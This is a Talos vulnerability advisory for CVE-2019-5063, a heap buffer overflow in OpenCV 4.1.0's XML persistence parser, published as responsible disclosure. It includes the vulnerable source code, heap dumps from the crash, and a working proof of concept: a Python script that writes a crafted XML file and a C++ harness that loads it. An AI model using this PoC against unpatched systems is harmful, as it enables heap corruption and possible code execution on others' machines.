Talos Vulnerability Report

TALOS-2019-0852

OpenCV XML Persistence Parser Buffer Overflow Vulnerability

January 2, 2020
CVE Number

CVE-2019-5063

Summary

An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0. A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.

Tested Versions

OpenCV 4.1.0

Product URLs

[https://opencv.org/] (https://opencv.org/)
[https://github.com/opencv/opencv] (https://github.com/opencv/opencv)

CVSSv3 Score

8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

Details

OpenCV was originally developed in 1999 by Intel Research and is currently maintained by the non-profit organization OpenCV.org. OpenCV is used in a myriad of ways, including facial recognition, robotics, motion tracking and various machine learning applications.

This particular vulnerability is present in the “persistence” mode of OpenCV that allows a developer to write and retrieve OpenCV data structures to/from a file on disk. The file type can be XML, YAML or JSON.

During parsing of a XML file containing a potential character entity reference, when the ampersand is encountered, the API will continue to digest alphanumeric characters until a semicolon is encountered. If the string does not match one of the strings in the switch statement, the data is instead copied to a buffer as is.

In persistence_xml.cpp, we can see the definition of the buffer that will be overflowed which resides within a FileStorageParser class on the heap.

char strbuf[CV_FS_MAX_LEN+16];

Where persistence.hpp defines CV_FS_MAX_LEN as:

44  #define CV_FS_MAX_LEN 4096

Therefore, our buffer size is 0x1010 (4112) bytes in length. The overflow occurs during the following parsing routine within persistence_xml.cpp:

583                             else if( c == '&' )
584                             {
585                                 if( *++ptr == '#' )
586                                 {
587                                     int val, base = 10;
588                                     ptr++;
589                                     if( *ptr == 'x' )
590                                     {
591                                         base = 16;
592                                         ptr++;
593                                     }
594                                     val = (int)strtol( ptr, &endptr, base );
595                                     if( (unsigned)val > (unsigned)255 ||
596                                        !endptr || *endptr != ';' )
597                                         CV_PARSE_ERROR_CPP( "Invalid numeric value in the string" );
598                                     c = (char)val;
599                                 }
600                                 else
601                                 {
602                                     endptr = ptr;
603                                     do c = *++endptr;
604                                     while( cv_isalnum(c) );
605                                     if( c != ';' )
606                                         CV_PARSE_ERROR_CPP( "Invalid character in the symbol entity name" );
607                                     len = (int)(endptr - ptr);
608                                     if( len == 2 && memcmp( ptr, "lt", len ) == 0 )
609                                         c = '<';
610                                     else if( len == 2 && memcmp( ptr, "gt", len ) == 0 )
611                                         c = '>';
612                                     else if( len == 3 && memcmp( ptr, "amp", len ) == 0 )
613                                         c = '&';
614                                     else if( len == 4 && memcmp( ptr, "apos", len ) == 0 )
615                                         c = '\'';
616                                     else if( len == 4 && memcmp( ptr, "quot", len ) == 0 )
617                                         c = '\"';
618                                     else
619                                     {
620                                         memcpy( strbuf + i, ptr-1, len + 2 );
621                                         i += len + 2;
622                                     }
623                                 }

The overflow occurs at line 620. It happens because the buffer is a fixed size, but the size for the memcpy is calculated as the length of the entire XML entity value (line 596) without checking if it extends beyond the target buffer.

Crash Information

We can see the vulnerable memcpy operation occur here:

0x41f71f    call   memcpy@plt <0x406470>
    dest: 0x91c380 ◂— 0x676e69727400
    src: 0x911e15 ◂— 0x4242424242422026 ('& BBBBBB')
    n: 0x2c83

If the buffer size is only 0x1010 (4112) bytes, and the memcpy size (the entire value of one of the entity reference string) is 0x2c83 (11395) bytes, there will be an overflow into subsequent heap objects, leading to potential code execution.

The destination buffer is located within the ‘FileStorageParser` object itself:

type = class cv::XMLParser : public cv::FileStorageParser {
  public:
    cv::FileStorage_API *fs;
    char strbuf[4112];

    XMLParser(cv::FileStorage_API *);
    virtual ~XMLParser(void);
    char * skipSpaces(char *, int);
    virtual bool getBase64Row(char *, int, char *&, char *&);
    char * parseValue(char *, cv::FileNode &);
    char * parseTag(char *, std::__cxx11::string &, std::__cxx11::string &, int &);
    virtual bool parse(char *);
} *

In this particular case, the heap object for this instance is located at 0x91c350. The buffer is located at 0x91c380.

Heap chunk: 0x91c358 (malloc address)
Heap chunk header: 0x91c350
             Size: 0x1040 (4160)
         Size+Hdr: 0x1050 (4176)
           Status: in USE
  Prev size field: 0x0 (0)
         Raw Size: 0x1041 (4161)
            Flags: PREV_INUSE

 000000000091c340: 00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00 .@..............
 000000000091c350: 00 00 00 00 00 00 00 00  41 10 00 00 00 00 00 00 ........A.......
 000000000091c360: 48 3f 8e 00 00 00 00 00  01 00 00 00 01 00 00 00 H?..............
 000000000091c370: 98 3f 8e 00 00 00 00 00  60 04 91 00 00 00 00 00 .?......`.......
                                         ....
 000000000091d380: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ................
 000000000091d390: 00 00 00 00 00 00 00 00  21 00 00 00 00 00 00 00 ........!.......

The next object in the heap is located at 0x91d390 which is exactly 0x1040 (4160) bytes away:

Heap chunk: 0x91d398 (malloc address)
Heap chunk header: 0x91d390
             Size: 0x20 (32)
         Size+Hdr: 0x30 (48)
           Status: in USE
  Prev size field: 0x0 (0)
         Raw Size: 0x21 (33)
            Flags: PREV_INUSE

 000000000091d380: 00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 ................
 000000000091d390: 00 00 00 00 00 00 00 00  21 00 00 00 00 00 00 00 ........!.......
                                         ....
 000000000091d3a0: 00 73 74 72 69 6e 67 73  00 00 00 00 00 00 00 00 .strings........
 000000000091d3b0: 00 00 00 00 00 00 00 00  51 1c 00 00 00 00 00 00 ........Q.......

Here are the objects after the memcpy() operation:

Heap chunk: 0x91c358 (malloc address)
Heap chunk header: 0x91c350
             Size: 0x1040 (4160)
         Size+Hdr: 0x1050 (4176)
           Status: is FREE
               FD: 0x8e3f48
               BK: 0x100000001
  Prev size field: 0x0 (0)
         Raw Size: 0x1041 (4161)
            Flags: PREV_INUSE

 000000000091c340: 00 40 00 00 00 00 00 00  00 00 00 00 00 00 00 00 .@..............
 000000000091c350: 00 00 00 00 00 00 00 00  41 10 00 00 00 00 00 00 ........A.......
 000000000091c360: 48 3f 8e 00 00 00 00 00  01 00 00 00 01 00 00 00 H?..............
 000000000091c370: 98 3f 8e 00 00 00 00 00  60 04 91 00 00 00 00 00 .?......`.......
                                         ....
 000000000091d380: 42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
 000000000091d390: 42 42 42 42 42 42 42 42  42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB

The heap object at 0x91d390 has clearly been corrupted.

0x91d390:	0x4242424242424242	0x4242424242424242
0x91d3a0:	0x4242424242424242	0x4242424242424242
0x91d3b0:	0x4242424242424242	0x4242424242424242
0x91d3c0:	0x4242424242424242	0x4242424242424242
0x91d3d0:	0x4242424242424242	0x4242424242424242
0x91d3e0:	0x4242424242424242	0x4242424242424242
0x91d3f0:	0x4242424242424242	0x4242424242424242
0x91d400:	0x4242424242424242	0x4242424242424242

The heap segment extends from 0x8f9000 to 0x91f000 (in this instance). This specific variant of the attack will trigger an access violation because an attempt to copy data beyond the heap segment will occur.

0x8f9000           0x91f000 rw-p    26000 0      [heap]


Program received signal SIGSEGV, Segmentation fault.
__memmove_sse2_unaligned_erms () at ../sysdeps/x86_64/multiarch/memmove-vec-unaligned-erms.S:481
481		VMOVU	%VEC(8), (%r11)

Exploit Proof of Concept

Generate a malicious XML file:

#!/usr/bin/env python
from struct import pack

poc = b'<?xml version="1.0"?><opencv_storage><strings>'
poc += b'string'
poc += b' & '
poc += b'B' * 0x2c80

# Required
poc += b';'
poc += b'</strings>'
with open("poc.xml", "wb") as f:
    f.write(poc)
f.close()

Compile the harness to load the file:

#include "opencv2/core.hpp"
/*
 * harness.cpp
 * g++ -I/usr/include/opencv4/ harness.cpp -o harness -l opencv_core
 */

int main(int argc, char** argv) {
    cv::FileStorage fs2(argv[1], cv::FileStorage::READ);
    fs2.release();
    return 0;
}

Execution: $ ./harness poc.xml [1] 24290 segmentation fault (core dumped) ./harness poc.xml

Timeline

2019-07-22 - Initial contact
2019-07-30 - Plain text report issued
2019-10-02 - 60+ day follow up
2019-10-21 - 90 day follow up
2019-11-13 - Vendor confirmed fix planned for December 2019 release
2019-12-12 - Talos granted extension to public disclosure deadline
2019-12-19 - Vendor patched
2020-01-02 - Public Release

Credit

Discovered by Dave McDaniel of Cisco Talos.